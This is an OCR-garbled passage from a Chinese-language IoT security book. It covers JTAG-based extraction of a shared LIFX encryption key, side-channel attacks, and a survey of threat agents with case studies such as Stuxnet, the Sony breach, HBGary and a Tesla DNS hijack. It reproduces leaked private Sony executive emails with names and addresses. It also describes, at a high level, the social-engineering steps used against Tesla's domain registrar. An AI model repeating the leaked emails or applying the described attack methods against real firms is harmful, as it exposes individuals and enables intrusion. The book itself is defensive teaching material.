TDO (测试 数据 出 ) 、TCK (测试 时 钟 ) 、TMS (测试 模式 选择 ) ， 以 及 TRST (测试 重 置 ) 。 确 定 这 些 引 脚 可 能 比较 费事 ， 但 是 流行 的 JTAGulator 硬 件 工具 可 以 自动 识别 它 
们 。Joe Grand 是 该 款 工具 的 创造 者 ， 在 他 的 YouTube 视 频 中 解释 了 如 何 使 用 上 TAGulator。 


安全 研究 人 员 在 使 用 上 TAG 接口 发 现 安全 漏洞 时 ， 发 现 LIFX 灯 泡 使 用 了 该 接口 。 与 菲利普 照明 系统 不 同 ，LIFX 体 系 结构 中 不 需要 集线器 ， 而 是 通过 接 入 到 WiFi 网 络 中 并 取 
得 了 主 控 灯 泡 的 信任 ， 它 以 这 种 方式 工作 。 其 他 灯泡 使 用 6LoWPAR 标 准 接 入 到 主 控 灯 泡 上 (该 名 称 表 示 使 用 IPV6 协 议 的 低 功 耗 个 人 区 域 网 络 ) 。 这 允许 灯泡 使 用 低 功 耗 ， 特 
别 是 在 不 需要 照 亮 ， 以 及 需要 借助 网 格 网 络 扩展 用 户 网 络 至 WiF 控制 范围 时 。 


研究 人 员 使 用 jTAG 接 口 获取 存储 在 灯泡 中 的 固件 。 该 固件 包含 一 个 全 球 性 的 加 密 密 铀 ， 在 所 有 的 LIFX 灯 泡 中 都 是 一 样 的。 该 对 称 加 密 密 钥 用 户 对 企业 内 部 的 所 有 灯泡 通 
信 是 进行 加 密 与 解密 。 有 了 这 条 信息 ， 研 究 人 员 了 解 到 他 们 可 以 向 LIFX 网 格 网 络 中 注入 任意 指令 ， 人 允许 他 们 控制 灯光 。 本 例 中 ， 攻 击 者 需要 在 LIFX 灯 泡 30 距 离 之 内 ， 因 而 攻击 
者 是 在 本 地 网 络 中 进行 攻击 的 。 


UART 接 口 和 路 AG 接 口 可 以 用 来 发 现 安全 问题 ， 比 如 全 球 共享 加 密 密 钥 ， 一 旦 密 钥 被 获取 ， 攻 击 者 可 以 对 产品 体系 进行 攻击 ， 因 而 共享 加 密 密 钥 不 是 一 个 好 的 思路 。 在 
clougBit 原 型 例子 中 ， 我 们 通过 将 本 地 WiFi 密 钥 以 明文 的 方式 存储 在 硬盘 上 解决 该 问题 。 硬 件 平台 的 存储 加 密 是 一 个 很 常见 的 问题 ， 攻 击 者 肯定 会 尝试 解密 。 为 了 帮助 获取 更 
好 的 硬件 安全 性 ，Trusted Computing Group (TCG) 公布 了 Trusted Platform Module (可 信 平 台 模 块 ，TPM) 标准 ， 并 不 断 对 该 标准 进行 更 新 。TCG 提 供 的 标准 说 明 人 允 
许 设计 人 员 构 建 一 个 安全 的 硬件 处 理 器 ， 可 以 对 存储 加 密 (如 密码 和 加 密 密 铀 ) ， 增 强 可 靠 性 。 


设计 人 员 和 架构 师 凑 在 一 起 ， 在 产品 的 初始 原型 阶段 对 设备 的 推荐 版 本 及 硬件 安全 进行 有 效 验 证 ， 包 括 UART 和 路 AG 功 能 的 可 用 性 ， 现 在 是 一 个 关注 的 话题 。 假 定 道德 安 
全 研究 人 员 以 及 黑客 拥有 高 超 的 技能 ， 能 够 调试 硬件 ， 并 且 最 终 获 得 接口 的 访问 权限 。 要 记 住 重要 的 一 点 : LIFX 的 问题 不 在 于 泄露 了 JTAG 的 加 密 密 钥 ， 而 是 在 每 一 款 灯 泡 中 
都 使 用 了 相同 的 加 密 密 铀 ， 这 才 是 安全 问题 所 在 。 物 联网 产品 生产 商 应 当 认真 考虑 加 密 问题 (比如 WiFi 认 证 ) ， 他 们 的 产品 必须 对 此 负责 。 标 准 以 及 TPM 处 理 器 能 够 ， 并 且 也 
应 当 在 实际 中 使 用 ， 以 进一步 确保 机 密 数 据 的 可 靠 性 ， 防 止 他 们 出 现在 国 件 中 ， 或 者 通过 硬件 端口 调试 被 获取 。 


边 信道 攻击 
除了 调试 接口 和 秘密 的 安全 存储 硬件 ， 物 联网 硬件 设计 人 员 也 应 该 考虑 到 边 信道 攻击 (side channel attack) 的 可 能 性 ， 即 从 系统 的 物理 访问 上 获取 数据 来 打破 安全 控制 、 
偷 取 密 码 和 加 密 密 钥 等 机 密 信息 。 计 算 系 统 的 功率 分 析 已 经 成 为 一 个 流行 的 边 信道 攻击 方法 。ChipWhisperet 硬 件 和 软件 套件 工具 可 通过 检查 设备 的 功率 消耗 来 分 析 特 定 设备 信 
息 泄露 情况 。 研 究 人 员 还 能 够 使 用 音响 例如 ， 操 作 过 程 中 使 用 噪声 计算 设备 来 提取 和 破译 加 密 密 钥 。 边 信道 攻击 过 去 一 直 用 于 漏洞 攻击 ， 对 于 物 联网 设计 人 员 很 重要 
的 一 点 是 : 他 们 要 确保 理解 硬件 泄露 信息 的 各 种 方法 ， 这 些 方 法 能 够 用 来 攻击 他 们 的 系统 。 


7.3 ”威胁 代理 攻击 案例 


威胁 代理 可 能 会 对 漏洞 展开 攻击 ， 为 了 应 对 潜在 的 滥用 案例 ， 需 要 了 解 潜 在 威胁 代理 所 处 的 环境 。 威 胁 代理 是 一 个 人 或 者 是 一 组 人 ， 他 们 可 能 为 了 私人 利益 实施 漏洞 攻 
击 。 威 胁 代理 在 技术 水 平 上 有 高 有 低 ， 在 掌握 的 资源 和 要 达成 的 目标 上 也 不 尽 相同 。 例 如 ， 一 伙 有 资金 支持 的 黑客 可 能 会 对 某 个 特定 的 资产 使 用 可 持续 利用 并 且 是 高 精 尖 的 攻 
击 策略 手段 ， 而 一 个 心怀 不 满 的 员工 可 能 会 利用 他 掌握 的 保密 信息 ， 破 坏 服 务 或 者 泄露 专用 信息 。 下 一 节 就 介绍 一 些 常见 的 威胁 代理 的 例子 。 


7.3.1 国家 级 的 ， 包 括 国家 安全 局 


国家 级 黑客 是 有 高 级 技术 能 力 的 黑客 ， 他 们 得 到 政府 的 资助 。 有 了 资金 和 支持 ， 他 们 会 对 目标 实施 持续 不 断 地 攻击 ， 直 至 成 功 为 止 。 他 们 使 用 的 技巧 不 易 被 检测 
到 ， 他 们 完成 基础 设施 的 攻击 之 后 会 对 该 设施 维持 很 长 时 间 的 访问 控制 。 一 组 针对 大 公司 的 攻击 被 曝光 之 后 ， 这 类 威胁 代理 才 被 社会 主流 注意 到 ，2009 年 年 未 ， 他 们 有 了 个 名 
字 “ 极 光 行 动 ” (Operation Aurora) 。 他 们 的 目标 包括 类 似 于 Google、Adobe Systems, Juniper Networks, Rackspace, Yahoo! , Symatec, Northrop 


Grumman, Morgan Stanley 和 Dow Chemical 这 些 大 型 的 公司 。 


美国 国家 安全 局 也 是 威胁 代理 的 候选 部 门 之 一 。 爱 德 华 -斯 诺 登 泄露 的 信息 中 就 描绘 了 美国 国家 安全 局 尝试 监控 美国 民众 ， 并 对 国外 目标 实施 打击 。 斯 诺 登 泄露 的 信息 在 道 
德 层面 上 可 能 是 有 争议 的 。 


j 


斯 诺 登 坚信 美国 国家 安全 局 和 以 色 列 政府 编写 了 著名 的 Stuxnet 蠕 虫 病毒 。Stuxnet 的 目标 是 通过 感染 计算 机 并 挫 毁 大 约 1/5 的 离心 机 ， 使 他 们 失去 控制 以 挫 毁 伊朗 的 核 计 
划 。 这 是 网 络 武器 的 一 个 著名 的 例子 ， 也 是 恶意 软件 导致 物理 设备 设施 最 终 影响 关键 系统 的 一 个 例子 。 


2015 年 2 月 ， 卡 巴 斯 基 实验 室 的 研究 人 员 透 漏 了 一 款 适 应 力 强大 的 恶意 软件 ， 该 软件 可 以 在 由 希捷 、 东 芝 和 西部 数据 生产 的 硬盘 固件 上 安装 一 个 后 门 。 该 后 门 很 难 被 检测 
到 ， 因 为 它 会 检测 每 一 个 尝试 读 取 硬盘 发 现 恶意 代码 的 企图 。 研 究 人 员 注 意 到 : 部 分 后 门 代码 与 已 经 发 现 的 Stuxnet 模 块 非常 相似 。 他 们 进一步 指出 ， 发 现 被 感染 的 机 器 来 自 
美国 通常 监视 的 国家 。 


物 联 网 设备 日 益 流行 ， 肯 定 会 成 为 国家 资助 黑客 组 织 的 一 个 兴趣 领域 。 他 们 想 要 窃取 商业 机 密 ， 获 取 关 键 设施 的 访问 权 。 他 们 可 能 会 将 供应 链 作 为 目标 ， 通 过 在 软件 或 硬 
件 中 注入 恶意 代码 ， 或 者 利用 互联 网 络 远程 攻击 设备 ， 尝 试 攻击 支撑 物 联 网 基础 架构 的 整个 平台 。 


7.3.0 TW 


过 去 ,恐怖 分 子 实施 人 身 攻 击 ， 制 造 恐 怖 ， 随 着 时 间 的 推移 ， 他 们 逐渐 开始 利用 通过 物 联网 能 访问 到 的 基础 设施 的 漏洞 。 最 近 的 一 个 例子 是 : 2013 年 ， 一 个 名 为 叙利亚 电 
子 军 的 攻击 者 发 动 针对 《纽约 时 报 》、 推 特 以 及 叙利亚 政府 支持 的 《 赫 芬 顿 邮 报 》 的 攻击 。 攻 击 者 攻陷 了 用 于 配置 DNS 记录 设置 网 站 域名 的 认证 服务 ， 引 起 了 服务 的 中 断 。 


网 络 恐 怖 分 子 会 利用 物 联网 设备 制造 恐慌 和 混乱 。 攻 击 目标 有 可 能 是 著名 的 人 或 家 庭 ， 从 而 引起 最 大 程度 的 新 闻 效 应 ， 进 而 提升 忍 慌 程度 。 心 脏 起 搏 器 等 维持 生命 健康 的 
设备 逐渐 可 以 远程 配置 ， 这 已 经 被 认为 是 有 漏洞 的 攻击 目标 了 。 


随 着 智能 城市 的 出 现 ， 类 似 的 技术 串联 在 一 起 ， 用 于 减少 资源 消耗 ， 提 升 生活 便利 ， 这 也 成 为 恐怖 分 子 的 目标 之 一 。 高 层 公寓 以 及 支持 智能 城市 的 家 庭 可 能 会 使 用 相同 的 
硬件 产品 来 提升 效率 和 互 操作 性 。 这 意味 着 一 个 已 知 的 可 远程 访问 物 联 网 设备 的 漏洞 能 够 被 跨 城市 利用 。 这 种 场景 有 可 能 被 威胁 代理 利用 ， 通 过 停电 、 锁 住 或 解锁 门 、 控 制 汽 
车 、 发 布 火警 来 制造 恐怖 气氛 。 因 此 对 于 设计 者 来 说 ， 最 关键 的 是 要 了 解 操作 他 们 设备 的 恶意 机 构 的 动机 。 


例如 ， 基 于 物 联 网 照明 系统 的 架构 师 要 考虑 他 们 的 系统 会 成 为 攻击 目标 ， 被 恶意 机 构 所 使 用 ， 要 设计 相应 的 安全 对 策 ， 这 是 很 重要 的 。 


7.3.3 ”犯罪 组 织 


我 们 知道 ， 私 人 犯罪 组 织 已 经 变 得 非常 狗 独 ， 非 常 有 经 验 。 这 类 机 构 的 主要 动机 是 通过 偷 钱 或 窃取 知识 产权 (知识 产权 可 以 卖 给 受害 人 的 竞争 对 手 ) 获取 商业 利益 。 


2015 年 2 月 ， 安 全 公司 卡巴 斯 基 声 称 ， 他 们 发 现 了 一 个 犯罪 组 织 的 犯罪 行为 ， 能 够 通过 感染 了 病毒 的 银行 计算 机 窃取 10 亿 美元 。 被 攻击 的 银行 目标 包括 俄罗斯 、 美 国 、 德 


国 、 中 国 、 乌 克 兰 、 加 拿 大 、 罗 马 尼 亚 、 法 国 、 西 班 牙 、 挪 威 、 印 度 、 英 国 、 波 兰 、 巴 基 斯 坦 、 尼 泊 尔 、 摩 洛 哥 、 冰 岛 、 爱 尔 兰 、 捷 克 共 和 国 、 瑞 士 、 巴 西 、 保 加 利 亚 以 及 澳 
大 利 亚 。 平 均 每 次 攻击 会 导致 1000 万 美元 的 损失 。 犯 罪 分 子 甚至 能 够 控制 银行 的 自动 取款 机 ， 让 它们 在 预定 时 间 提 供 现金 。 


联网 设备 对 于 犯罪 组 织 来 说 是 一 个 非常 理想 的 目标 ， 因 为 可 以 借助 这 些 设备 作为 跳板 进入 到 目标 网 络 内 部 。 还 可 进一步 利用 ， 获 取 内 部 网 络 工作 站 的 访问 权限 ， 进 而 获得 
知识 产权 和 金融 数据 信息 。 比 如 ， 黑 客 已 经 控制 了 家 里 联网 的 冰箱 。 之 后 ， 黑 客 可 以 利用 这 人 台 冰 箱 发 送 恶意 邮件 给 其 他 受害 人 来 增加 僵尸 网 络 的 面积 。 术 语 thingbot 正 被 越 来 
越 多 地 用 于 描述 包括 可 被 利用 攻击 企业 和 个 人 的 物 联网 设备 的 僵尸 网 络 。 


7.34 ”心怀 不 满 或 爱 管 采 事 的 雇员 


这 群 人 包括 企业 中 心怀 不 满 的 人 、 爱 管 闲事 的 人 或 者 告密 者 。 在 企业 内 部 网 络 上 很 容易 就 能 获取 设备 的 访问 权 。 很 多 企业 并 没有 良好 的 基于 角色 的 访问 权限 设计 ， 以 限制 
员工 访问 过 多 的 企业 信息 ， 因 为 这 会 增加 实现 和 维护 的 成 本 。 很 多 情况 下 ， 心 怀 不 满 的 员工 在 他 们 的 日 常 工作 中 已 经 合法 地 获取 了 敏感 数据 。 


2014 年 的 数据 泄露 事件 攻击 了 索尼 影 业 公司 ， 导 致 公司 暂停 发 布 影片 《The Interview》， 因 为 攻击 者 威胁 要 毁坏 影院 并 泄露 更 多 的 数据 。 最 初 ， 攻 击 被 认为 是 朝鲜 人 干 


的 ， 因 为 这 部 喜剧 电影 中 含有 刺杀 其 领导 人 金正 局 


的 情景 。 然 而 ， 后 来 的 调查 确信 ， 攻 击 者 很 可 能 是 一 个 心怀 不 满 的 公司 前 员工 ， 他 了 解 公司 网 络 基础 设施 的 漏洞 ， 能 够 进入 


司 内 部 获取 数据 。 攻 击 者 获取 并 发 布 了 索尼 高 管 的 邮件 拷贝 ， 包 括 如 图 7-27 的 一 幅 图 片 。 在 这 封 邮 件 中 ， 索 尼 高 管 和 一 个 著名 电影 制 片 人 谈 及 了 关于 奥巴马 总 统 的 私人 内 


公 
容 。 后 来 ， 两 位 高 管 都 向 公众 对 谈话 的 内 容 进 行 了 道歉 。 
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sr(»scottrudinproductions.com 


To amy pascal&spe.sony.com 


Re: 
Ride-along. I bet he likes Kevin Hart. 


On 11/26/13 11:21 AM, "Amy Pascal* «Amy. Pascal()spe.sony.com? wrote: 


Or the butler 
Or think like a man? 


On Nov 26, 2013, at 8:20 AM, "Scott Rudin" «sr&scottrudinproductions.com» wrote: 


Re: 12 YEARS. 


On 11/26/13 11:05 AM, "Amy Pascal” «Amy PascalGspe.sony.com-» wrote: 


I doubt it 
Should I ask him if he liked DJANGO 


On Nov 26, 2013, at 8:01 AM, "Scott Rudin" <sr@scottrudinproductions.com> wrote: 


Re: Would he like to finance some movies? 


On 11/26/13 9:55 AM, "Amy Pascal" <Amy_Pascal@spe.sony.com> wrote: 


What should I ask the president 
At this stupid Jeffrey breakfast 


图 7-27: 攻击 泄露 的 索尼 影 业 高 管 和 制 片 人 斯 科 特 '， 鲁 丁 之 间 内 部 电子 邮件 的 部 分 内 容 


威胁 代理 的 行为 可 能 会 导致 个 人 或 企业 名 誉 的 受 损 ， 反 过 来 会 对 作为 攻击 对 象 的 被 曝光 者 职业 生涯 产生 负面 影响 。 缺 乏 信誉 也 会 导致 缺乏 用 户 信任 ， 而 这 会 对 业务 造成 长 


期 和 持续 的 负面 影响 。 


物 联网 生产 商 必须 明白 ， 心 怀 不 满 的 可 以 获取 用 户 信息 的 员工 是 会 造成 信用 信息 风险 的 。 做 客户 支持 的 员工 经 常会 访问 用 户 账户 ， 这 样 他 们 才能 处 理 问 题 ， 对 用 户 请 求 提 


供 服务 支持 。 生 产 联网 门 锁 公司 的 客户 代表 是 有 可 能 远程 锁 住 或 解锁 用 户 的 门 的 。 这 会 使 他 们 变 成 社会 工程 学 供给 人 员 最 喜欢 的 攻击 目标 ， 而 客户 支持 代表 可 


ABA: 
Be 


被 欺骗 而 打 


开 属 于 其 他 人 的 锁 。 心 怀 不 满 的 人 通过 将 所 有 门 锁 在 线 解锁 ， 导 致 用 户 支持 热线 被 打 爆 ， 破 坏 公司 名 誉 ， 让 用 户 处 于 危险 状态 ， 所 带 来 的 破坏 是 极 大 的 。 


参与 设计 和 供应 链 处 理 的 员工 只 能 被 赋予 属于 其 自己 的 角色 。 供 应 链 过 程 应 当 安 全 工程 化 ， 确 保 员工 不 能 篡改 软件 或 硬件 ， 安 装 间谍 软件 或 后 门 程序 。 例 如 ， 能 够 访问 用 
于 更 新 婴儿 监控 器 国 件 源 代码 的 员工 可 能 会 尝试 悄悄 地 设置 一 个 后 门 账 号 ， 以 便 他 今后 控制 和 访问 所 有 公司 生产 的 婴儿 监控 器 。 


这 类 威胁 代理 的 攻击 案例 分 析 还 应 当 包含 第 三 方 承包 商 和 合作 伙伴 。 物 联网 产品 设计 人 员 要 充分 考虑 到 可 能 来 自 威胁 代理 的 攻击 情况 ， 以 便 建 立 对 设备 的 控制 ， 还 要 考虑 
到 后 端 基础 设施 以 及 产品 配套 过 程 的 安全 ， 这 些 都 是 很 重要 的 。 


7.3.5 ”黑客 激进 分 子 


这 类 组 织 和 个 人 一 一 黑客 和 激进 主义 分 子 的 结合 体 一 一 利用 技术 上 的 漏洞 来 推动 政治 议程 ， 一 般 涉及 人 权 和 信息 自由 等 领域 。 最 好 的 一 个 例子 就 是 名 为 
Anonymouse (匿名 ) 的 组 织 。 他 们 将 自己 定义 为 “松散 的 、 非 集中 化 的 命令 机 构 ， 思 想 指挥 行为 ， 而 不 会 命令 ”。 该 组 织 的 名 称 来 源 于 4chan 网 站 ， 在 这 里 用 户 可 以 分 享 各 
自 不 同类 别 的 图 像 。 网 站 不 需要 注册 ， 发 布 信息 的 用 户 都 会 被 标 以 “匿名 ”的 标签 。 


2008 年 ， 匿 名 组 织 发 起 了 一 个 名 为 Chanology 的 项 目 ， 致 力 于 打击 报复 山 达 基教 会 的 审查 。 一 部 由 明星 汤姆 克 鲁 斯 出 演 的 讨论 山 达 基教 会 优点 的 私人 视频 被 发 布 到 了 
Gawker 网 站 上 。 视 频 最 初 来 自 于 YouTube， 山 达 基 教会 发 出 了 侵权 通知 ， 之 后 视频 就 删除 了 。 匿 名 组 织 认 为 这 是 不 公平 的 ， 于 是 发 起 了 针对 山 达 基教 会 网 站 的 拒绝 服务 供 
给 ， 以 示 抗 议 。 他 们 还 恶作剧 发 送 纯 黑 的 传真 信息 ， 浪 费 教 会 传真 机 的 墨水 。 


2010 年 11 月 ， 维 基 解 密 泄露 了 数 十 万 条 美国 外 交 电 报 。 由 于 担心 来 自 美国 的 法 律 威胁 ，Amazon 终 止 了 对 维基 解密 网 站 的 托管 。PayPal、MasterCard 和 Visa 也 撤销 了 对 
该 组 织 的 服务 。 结 果 匿 名 组 织 成 员 声明 为 Assange 实 施 报复 行动 ， 以 支持 Julian Assange, Julian Assange 是 维基 解密 的 创始 人 。 该 组 织 发 送 了 针对 PayPal、MasterCard 和 
Visa 的 拒绝 服务 攻击 ， 但 是 由 于 没有 搜集 到 足够 的 资源 ， 因 而 没有 对 Amazon 基 础 设施 造成 什么 危害 。 


2011 年 年 初 ， 网 络 安全 公司 HBGary Federal 的 首席 执行 官 Aaron Barr 声 称 : 他 运用 类 似 Facebook 和 Twitter 这 样 的 社交 媒体 平台 找到 了 一 些 匿名 组 织 成 员 的 对 应 身份 。 
作为 回应 ， 匿 名 组 织 成 员 对 HBGary 的 一 个 系统 实施 了 SQL 注入 攻击 并 完全 控制 了 系统 。 他 们 获取 了 Barr 在 Twitter 上 的 账户 ， 甚 至 生成 可 以 远程 擦 写 Barr 的 iPad。 他 们 还 发 布 
了 几 千 封包 含 内 部 交流 以 及 HBGary 客 户 详细 信息 的 机 密 邮 件 。 这 直接 导致 了 Barr 的 辞职 ，HBGary Federal 公 司 也 倒闭 了 。 


黑客 激进 主义 分 子 的 行为 通常 集中 在 扰乱 商业 活动 和 攻击 个 人 以 获取 媒体 和 公众 的 关注 。 安 装 在 工作 场所 和 家 中 的 物 联 网 设备 将 会 被 这 些 威胁 代理 认为 是 很 方便 的 攻击 目 
标 。 利 用 联网 的 门 锁 和 照明 系统 中 的 漏洞 ， 针 对 个 人 家 庭 的 攻击 会 危及 人 身 安全 。 类 似 婴儿 监控 器 以 及 智能 电视 这 类 物 联网 设备 有 可 能 成 为 攻击 目标 ， 泄 露 机 密 信息 。 用 户 和 
联网 设备 的 设计 人 员 都 需要 认真 考虑 黑客 激进 分 子 的 攻击 危险 ， 确 保 工程 化 的 、 配 置 良好 的 、 恰 当 的 安全 控制 手段 。 


7.3.6 vandals 


自从 有 互联 网 以 来 ，vandals 一 直 被 认为 是 最 有 名 的 威胁 代理 。 他 们 主要 的 宗旨 就 是 要 证 明 某 个 系统 是 能 够 被 攻陷 的 ， 而 且 他 们 经 常 喜欢 用 自己 的 信誉 来 证 明 这 一 点 。 即 
使 他 们 的 目的 除了 要 获得 暂时 的 名 声 之 外 ， 并 没有 造成 什么 危害 ， 结 果 也 经 常会 导致 个 人 和 公司 带 来 经 济 损失 ， 带 来 痛苦 和 声誉 的 损失 。 


2015 年 4 月 ，Tesla 汽 车 网 站 遭 到 破坏 ， 显 示 内 容 如 图 7-28 所 示 。 
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图 7-28: Tesla 汽 车 网 站 遭 到 破坏 


vandals 也 能 够 攻击 Tesla 的 Twitter 账户 ， 并 发 布 不 恰当 的 推 文 ， 包 括 承诺 免费 卖 车 (如 图 7-29 所 示 ) 。 
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图 7-29: Tesla 汽 车 的 Twittet 账 户 遭 到 vandals 攻 击 
该 组 织 攻 击 了 马 斯 克 的 Twitter 账户 ， 利 用 该 账户 发 布 推 文 (如 图 7-30 所 示 ) 。 
作为 回应 ，Tesla 发 布 如 下 公告 : 


本 次 事件 还 在 调查 中 ， 我 们 所 知道 的 是 : 有 人 假扮 Tesla 雇 员 ， 给 AT&cT 的 客户 支持 打 电 话 ， 将 他 们 的 呼叫 转移 到 一 个 非法 的 电话 号 码 上 。 然 后 这 个 骗子 联系 
为 teslamotots.com 域 名 提供 注册 的 公司 : Network Solutions。 使 用 呼叫 转移 号 码 ， 骗 子 将 一 个 虚假 的 电子 邮件 地 址 添加 到 Telsa 的 域名 管理 账户 上 。 然 后 骗子 会 重 置 域名 管理 密 
码 ， 将 大 部 分 的 网 站 流量 转移 到 一 个 虚假 的 网 站 上 ， 暂 时 获得 了 Tesla 和 Elon 的 Twitter 账户 访问 权限 。 
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图 7-30: 马 斯 克 的 Twittet 账 户 遭 到 vandals 攻 击 


有 一 些 客户 可 能 已 经 在 他 们 的 浏览 器 上 注意 到 了 www.teslamotots.com 的 临时 变化 ， 或 者 使 用 移动 应 用 程序 很 难 访问 Model S.Both， 这 是 因为 teslamotots.com 被 重 定向 了 。 


在 整个 事件 中 ， 我 们 公司 的 网 络 、 汽 车 和 客户 数据 库 都 是 安全 的 。 我 们 已 经 将 事态 恢复 如 初 了 。 我 们 正在 与 AT&T、Network Solutions 以 及 联邦 当局 一 起 进行 深入 调查 ， 并 
采取 所 有 可 能 的 积极 措施 确保 事件 不 再 发 生 。 


攻击 者 很 可 能 是 通过 重 定向 了 去 往 teslamotors.com 域 的 邮件 获取 了 Tesla Motors 和 Elon Musk 合 法 的 Twitter 账 户 ， 并 重 置 了 账户 密码 。 想 象 一 下 重 定向 Tesla 公 司 的 邮 
件 会 (可 能 真 的 已 经 发 生 了 ) 获取 多 少 其 他 的 信息 呢 。 


然而 黑客 并 没有 停止 他 们 的 脚步 ， 根 据 公 司 消息 公告 栏 上 发 布 的 消息 (如 图 7-31 所 示 ) ，Tesla 汽 车 客户 不 能 使 用 公司 的 iOS 应 用 程序 。 该 应 用 程序 (第 6 章 讨论 过 ) 也 多 
许 Tesla Model s 用 户 使 用 Phone， 无 需 使 用 智能 钥匙 就 可 以 定位 、 加 锁 、 解 锁 ， 甚 至 是 启动 汽车 。 鉴 于 智能 手机 日 益 流行 ， 人 们 日 益 依赖 它 ， 未 来 将 会 有 许 许多 多 的 汽车 车 
主 依赖 他 们 的 手机 来 解锁 汽车 ， 并 开动 汽车 ， 而 不 是 用 钥匙 ， 所 以 类 似 这 样 的 限制 策略 所 带 来 的 影响 会 越 来 越 大 。 
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| also lost connectivity on the official Tesla Model S app, as well as the forum app, which got 
redirected due to the DNS hijack. All ok now. 


图 7-31: 由 于 黑客 攻击 ，Tesla 用 户 无 法 使 用 OOS 应 用 程序 


黑客 借助 社会 工程 攻击 (冒充 公司 员工 ) 获取 整个 teslamotors.com 域 的 访问 控制 权限 这 一 能 力 如 此 简单 ， 但 是 会 对 大 公司 的 安全 造成 极 大 的 影响 。 除 了 攻击 网 站 和 
Twitter 账户 之 外 ， 黑 客 还 可 以 在 暗中 长 时 间 偷 取 公 司 知识 产权 和 财务 数据 。 对 于 这 类 公开 的 攻击 ， 被 攻击 公司 的 安全 操作 专业 人 员 立 刻 会 做 出 反应 ， 将 漏洞 关闭 。 想 要 实现 
比较 严重 的 金融 以 及 商业 打击 的 黑客 不 太 可 能 采取 如 此 明显 的 动作 ， 因 为 他 们 一 般 希 望 尽 可 能 长 时 间 拥 有 访问 控制 权限 。 然 而 ，vandals 热 囊 于 引起 媒体 的 注意 ， 能 够 发 现 漏 
洞 会 让 他 们 自我 感觉 良好 。 他 们 的 动机 可 能 是 单纯 的 ， 但 是 目标 公司 却 要 为 品牌 损失 付出 惨重 的 代价 。 


我 们 在 第 6 章 讨论 Tesla Model S 时 ， 看 到 这 些 汽车 使 用 在 线 3G 蜂 窝 网 络 连 接 并 接受 软件 更 新 ， 从 而 影响 物理 功能 。 现 在 以 及 未 来 的 汽车 拥有 者 在 媒体 上 看 到 这 次 攻击 之 
后 ,会 对 Tesla 在 应 对 社会 工程 学 攻击 方面 ， 保 护 其 基础 设施 方面 的 能 力 产生 质疑 ， 可 能 会 考虑 选择 其 他 汽车 制造 商 的 产品 。 他 们 也 会 担心 这 种 攻击 影响 到 了 汽车 的 功能 ， 致 
使 他 们 自身 的 安全 处 于 危险 的 境地 ， 甚 至 会 发 生 事故 。Tesla 的 竞争 对 象 也 会 利用 这 一 局 面向 用 户 兜 售 他 们 自己 的 产品 。 


从 物 联网 的 角度 来 看 ， 依 赖 于 终端 设备 的 云 平台 也 可 能 成 为 vandals 的 攻击 目标 。 想 象 一 下 ， 如 果 黑 客 利用 社会 工程 学 欺骗 第 4 章 我 们 讨论 的 smartThings 平 台 的 域名 注册 
商 ， 将 去 往 该 平台 流量 重 定向 到 黑客 的 系统 上 。 类 似 这 样 的 攻击 会 造成 vandals 可 以 让 SmartThings 在 同一 时 间 关 闭 ， 造 成 所 有 的 烟 感 报警 器 报警 。 另 一 个 场景 是 ， 造 成 特定 
婴儿 监控 器 上 的 视频 文件 向 全 世界 广播 。 物 联网 厂商 要 考虑 这 些 威胁 代理 会 采用 的 可 能 攻击 手段 ， 确 保 他 们 通盘 考虑 了 监控 需求 ， 这 会 帮助 他 们 检测 到 针对 云 平台 和 与 他 息 息 
相关 的 合作 伙伴 (如 域名 注册 商 ) 的 攻击 。 


7.3.7 ”网 络 暴力 


根据 2013 年 对 青年 人 危险 行为 检测 系统 的 调查 显示 ， 美 国 15% 的 高 中 生 曾 被 人 欺负 过 ， 超 过 了 2012 年 。 当 前 ， 孩 子 接触 的 技术 日 新 月 异 ， 网 络 暴力 随时 可 能 发 生 ， 并 且 
任何 人 都 有 可 能 被 侵犯 。 在 社交 媒体 网 站 上 ， 很 难 追踪 网 络 暴力 的 来 源 ， 因 为 消息 和 图 像 的 传递 都 是 匿名 的 ， 或 者 使 用 了 假 身份 。 网 络 暴力 会 使 受害 人 的 自信 心 和 健康 都 受到 


影响 。 


各 政府 机 构 一 起 创建 了 针对 暴力 包括 网 络 暴力 的 网 站 ， 以 推动 对 这 一 问题 的 共识 ， 并 为 受害 人 提供 寻求 帮助 的 机 制 。 


这 里 有 一 个 悲惨 的 例子 ,一 名 叫 Ryan Patrick Halligan 的 13 岁 男孩 上 吊 自杀 ， 原 因 就 是 网 络 暴力 。 Ryan 因为 他 学 习 能 力 差 在 学 校 遭 受 暴力 ， 并 因 谣言 他 是 同性 恋 而 长 其 
被 取笑 。 他 和 一 个 女孩 成 为 朋友 ， 女 孩 通 过 即时 信息 向 他 发 送 消息 表示 对 他 感 兴趣 。 她 后 来 告诉 Ryan， 说 他 在 同学 面前 是 一 个 “失败 者 ”。 后 来 Ryan 开始 在 网 上 与 一 个 朋友 
交流 ， 他 们 交流 如 何 根据 网 上 找到 的 方法 自杀 。Ryan 跟 他 的 朋友 发 送 消息 说 他 认真 地 考虑 了 自杀 ， 两 周 后 就 会 付 诸 行动 。Ryan 的 父亲 游说 佛蒙特 州 司 法 机 构 ， 成 功 地 说 服 州 
政府 颁布 欺凌 预防 政策 法 及 自杀 防治 法 (法案 114) 。 其 他 州 也 基于 Ryan 的 案例 推动 了 相关 法 案 的 制定 。 


不 幸 的 是 ， 还 有 很 多 其 他 类 似 的 故事 发 生 ， 鉴 于 拥有 移动 设备 和 社交 媒体 平台 的 孩子 数量 巨大 ， 网 络 暴力 的 形势 依然 严峻 。 到 目前 为 止 ， 我 们 看 到 的 这 个 例子 通常 都 是 利 
用 笔记 本 电脑 、 移 动 电话 、 电 子 邮 件 、 即 时 信息 以 及 Facebook 来 完成 的 。 然 而 ， 类 似 照明 、 联 网 的 门 锁 、 安 全 系统 等 物 联网 设备 能 够 也 必定 无 疑 会 被 犯罪 分 子 利用 ， 行 驶 网 
络 暴力 。 从 用 户 的 角度 讲 ， 父 母 必 须 开 始 意识 到 他 们 家 中 的 联网 设备 可 能 会 被 利用 ， 应 该 尽 最 大 努力 监控 他 们 孩子 的 行为 ， 监 控 他 们 访问 这 些 设备 的 情况 。 


产品 制造 商 也 应 当 考虑 尽 可 能 为 家 长 提供 给 小 孩 使 用 设备 的 配置 方式 ， 提 醒 他 们 可 疑 行为 的 发 生 。 例 如 ， 我 们 看 到 了 物 联 网 门 锁 能 够 允许 用 户 通 过 iPhone 应 用 程序 给 他 
